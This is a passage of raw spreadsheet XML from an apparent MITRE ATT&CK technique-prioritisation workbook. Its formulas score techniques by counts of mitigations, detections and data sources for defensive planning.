        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z188">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA188">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB188">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC188" s="29" t="s">
        <v>127</v>
      </c>
      <c r="AD188" s="25" t="str" cm="1">
        <f t="array" ref="AD188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC188)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE188" s="25">
        <f>IF(AD188="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF188" s="25" t="str" cm="1">
        <f t="array" ref="AF188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC188)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG188" s="25">
        <f>IF(AF188="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH188" s="25" t="str" cm="1">
        <f t="array" ref="AH188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC188)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI188" s="25">
        <f>IF(AH188="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ188" s="25" t="str" cm="1">
        <f t="array" ref="AJ188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC188)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK188" s="25">
        <f>IF(AJ188="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL188" s="25" t="str" cm="1">
        <f t="array" ref="AL188">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC188)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM188" s="25">
        <f>IF(AL188="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN188" s="60">
        <v>0</v>
      </c>
      <c r="AO188" s="51">
        <v>0</v>
      </c>
      <c r="AP188" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6866666666666668E-2</v>
      </c>
      <c r="AQ188" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15622222222222223</v>
      </c>
      <c r="AR188" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15622222222222223</v>
      </c>
      <c r="AS188" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT188" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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89" spans="1:47" ht="48">
      <c r="A189" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9889523809523812E-2</v>
      </c>
      <c r="B189" s="25">
        <f>SUM(H189,M189,V189)*(1+SUM(AE189,AG189,AI189,AK189,AM189))</f>
        <v>0.39889523809523808</v>
      </c>
      <c r="C189" s="25" t="s">
        <v>834</v>
      </c>
      <c r="D189" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E189" s="25" t="s">
        <v>835</v>
      </c>
      <c r="F189" s="51">
        <v>1</v>
      </c>
      <c r="G189" s="51">
        <v>1</v>
      </c>
      <c r="H189" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I189">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J189">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K189">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L189">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M189" s="25">
        <v>0</v>
      </c>
      <c r="N189" s="51">
        <v>1</v>
      </c>
      <c r="O189" s="51">
        <v>0</v>
      </c>
      <c r="P189" s="51">
        <v>2</v>
      </c>
      <c r="Q189" s="51">
        <v>0</v>
      </c>
      <c r="R189" s="52" t="s">
        <v>836</v>
      </c>
      <c r="S189" s="51">
        <v>9</v>
      </c>
      <c r="T189" s="52" t="s">
        <v>837</v>
      </c>
      <c r="U189" s="51">
        <v>16</v>
      </c>
      <c r="V189" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="W189">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X189">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y189">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z189">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA189">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB189">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC189" s="29" t="s">
        <v>838</v>
      </c>
      <c r="AD189" s="25" t="str" cm="1">
        <f t="array" ref="AD189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC189)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE189" s="25">
        <f>IF(AD189="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF189" s="25" t="str" cm="1">
        <f t="array" ref="AF189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC189)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG189" s="25">
        <f>IF(AF189="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH189" s="25" t="str" cm="1">
        <f t="array" ref="AH189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC189)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI189" s="25">
        <f>IF(AH189="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ189" s="25" t="str" cm="1">
        <f t="array" ref="AJ189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC189)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK189" s="25">
        <f>IF(AJ189="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL189" s="25" t="str" cm="1">
        <f t="array" ref="AL189">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC189)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM189" s="25">
        <f>IF(AL189="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN189" s="52">
        <v>0</v>
      </c>
      <c r="AO189" s="51">
        <v>0</v>
      </c>
      <c r="AP189" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.9889523809523812E-2</v>
      </c>
      <c r="AQ189" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13296507936507937</v>
      </c>
      <c r="AR189" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13296507936507937</v>
      </c>
      <c r="AS189" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT189" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU18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90" spans="1:47">
      <c r="A190" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5238095238095235E-2</v>
      </c>
      <c r="B190" s="25">
        <f>SUM(H190,M190,V190)*(1+SUM(AE190,AG190,AI190,AK190,AM190))</f>
        <v>0.35238095238095235</v>
      </c>
      <c r="C190" s="25" t="s">
        <v>839</v>
      </c>
      <c r="D190" s="25" t="s">
        <v>129</v>
      </c>
      <c r="E190" s="25" t="s">
        <v>840</v>
      </c>
      <c r="F190" s="51">
        <v>1</v>
      </c>
      <c r="G190" s="51">
        <v>1</v>
      </c>
      <c r="H190" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I190">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J190">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K190">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L190">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M190" s="25">
        <v>0</v>
      </c>
      <c r="N190" s="51">
        <v>2</v>
      </c>
      <c r="O190" s="51">
        <v>0</v>
      </c>
      <c r="P190" s="51">
        <v>0</v>
      </c>
      <c r="Q190" s="51">
        <v>1</v>
      </c>
      <c r="R190" s="52" t="s">
        <v>836</v>
      </c>
      <c r="S190" s="51">
        <v>9</v>
      </c>
      <c r="T190" s="52" t="s">
        <v>837</v>
      </c>
      <c r="U190" s="51">
        <v>16</v>
      </c>
      <c r="V190" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.25238095238095237</v>
      </c>
      <c r="W190">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X190">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y190">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z190">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA190">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB190">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC190" s="29"/>
      <c r="AD190" s="25" t="str" cm="1">
        <f t="array" ref="AD190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE190" s="25">
        <f>IF(AD190="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF190" s="25" t="str" cm="1">
        <f t="array" ref="AF190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG190" s="25">
        <f>IF(AF190="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH190" s="25" t="str" cm="1">
        <f t="array" ref="AH190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI190" s="25">
        <f>IF(AH190="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ190" s="25" t="str" cm="1">
        <f t="array" ref="AJ190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK190" s="25">
        <f>IF(AJ190="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL190" s="25" t="str" cm="1">
        <f t="array" ref="AL190">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC190)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM190" s="25">
        <f>IF(AL190="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN190" s="52">
        <v>0</v>
      </c>
      <c r="AO190" s="51">
        <v>0</v>
      </c>
      <c r="AP190" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5238095238095235E-2</v>
      </c>
      <c r="AQ190" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11746031746031745</v>
      </c>
      <c r="AR190" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11746031746031745</v>
      </c>
      <c r="AS190" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT190" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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91" spans="1:47" ht="80.099999999999994">
      <c r="A191" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6233333333333335E-2</v>
      </c>
      <c r="B191" s="25">
        <f>SUM(H191,M191,V191)*(1+SUM(AE191,AG191,AI191,AK191,AM191))</f>
        <v>0.46233333333333332</v>
      </c>
      <c r="C191" s="25" t="s">
        <v>841</v>
      </c>
      <c r="D191" s="25" t="s">
        <v>381</v>
      </c>
      <c r="E191" s="25" t="s">
        <v>842</v>
      </c>
      <c r="F191" s="51">
        <v>1</v>
      </c>
      <c r="G191" s="51">
        <v>1</v>
      </c>
      <c r="H191" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I191">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J191">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K191">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L191">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M191" s="25">
        <v>0</v>
      </c>
      <c r="N191" s="51">
        <v>0</v>
      </c>
      <c r="O191" s="51">
        <v>0</v>
      </c>
      <c r="P191" s="51">
        <v>0</v>
      </c>
      <c r="Q191" s="51">
        <v>0</v>
      </c>
      <c r="R191" s="52" t="s">
        <v>843</v>
      </c>
      <c r="S191" s="51">
        <v>6</v>
      </c>
      <c r="T191" s="52" t="s">
        <v>844</v>
      </c>
      <c r="U191" s="51">
        <v>20</v>
      </c>
      <c r="V191" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.24761904761904763</v>
      </c>
      <c r="W191">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X191">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y191">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z191">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA191">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB191">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC191" s="29" t="s">
        <v>845</v>
      </c>
      <c r="AD191" s="25" t="str" cm="1">
        <f t="array" ref="AD191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC191)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE191" s="25">
        <f>IF(AD191="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF191" s="25" t="str" cm="1">
        <f t="array" ref="AF191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC191)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG191" s="25">
        <f>IF(AF191="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH191" s="25" t="str" cm="1">
        <f t="array" ref="AH191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC191)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI191" s="25">
        <f>IF(AH191="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ191" s="25" t="str" cm="1">
        <f t="array" ref="AJ191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC191)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK191" s="25">
        <f>IF(AJ191="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL191" s="25" t="str" cm="1">
        <f t="array" ref="AL191">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC191)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM191" s="25">
        <f>IF(AL191="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN191" s="52">
        <v>0</v>
      </c>
      <c r="AO191" s="51">
        <v>0</v>
      </c>
      <c r="AP191" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6233333333333335E-2</v>
      </c>
      <c r="AQ191" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.15411111111111112</v>
      </c>
      <c r="AR191" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.15411111111111112</v>
      </c>
      <c r="AS191" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT191" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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92" spans="1:47" ht="32.1">
      <c r="A192" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6233333333333335E-2</v>
      </c>
      <c r="B192" s="25">
        <f>SUM(H192,M192,V192)*(1+SUM(AE192,AG192,AI192,AK192,AM192))</f>
        <v>0.46233333333333332</v>
      </c>
      <c r="C192" s="25" t="s">
        <v>846</v>
      </c>
      <c r="D192" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E192" s="25" t="s">
        <v>847</v>
      </c>
      <c r="F192" s="51">
        <v>1</v>
      </c>
      <c r="G192" s="51">
        <v>1</v>
      </c>
      <c r="H192" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I192">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J192">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K192">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L192">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M192" s="25">
        <v>0</v>
      </c>
      <c r="N192" s="51">
        <v>0</v>
      </c>
      <c r="O192" s="51">
        <v>6</v>
      </c>
      <c r="P192" s="51">
        <v>3</v>
      </c>
      <c r="Q192" s="51">
        <v>1</v>
      </c>
      <c r="R192" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S192" s="51">
        <v>8</v>
      </c>
      <c r="T192" s="52" t="s">
        <v>528</v>
      </c>
      <c r="U192" s="51">
        <v>13</v>
      </c>
      <c r="V192" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.24761904761904763</v>
      </c>
      <c r="W192">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X192">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y192">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z192">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA192">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB192">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC192" s="29" t="s">
        <v>848</v>
      </c>
      <c r="AD192" s="25" t="str" cm="1">
        <f t="array" ref="AD192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC192)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE192" s="25">
        <f>IF(AD192="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF192" s="25" t="str" cm="1">
        <f t="array" ref="AF192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC192)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG192" s="25">
        <f>IF(AF192="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH192" s="25" t="str" cm="1">
        <f t="array" ref="AH192">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC192)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI192" s="25">
        <f>IF(AH192="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ192" s="25" t="str" cm="1">
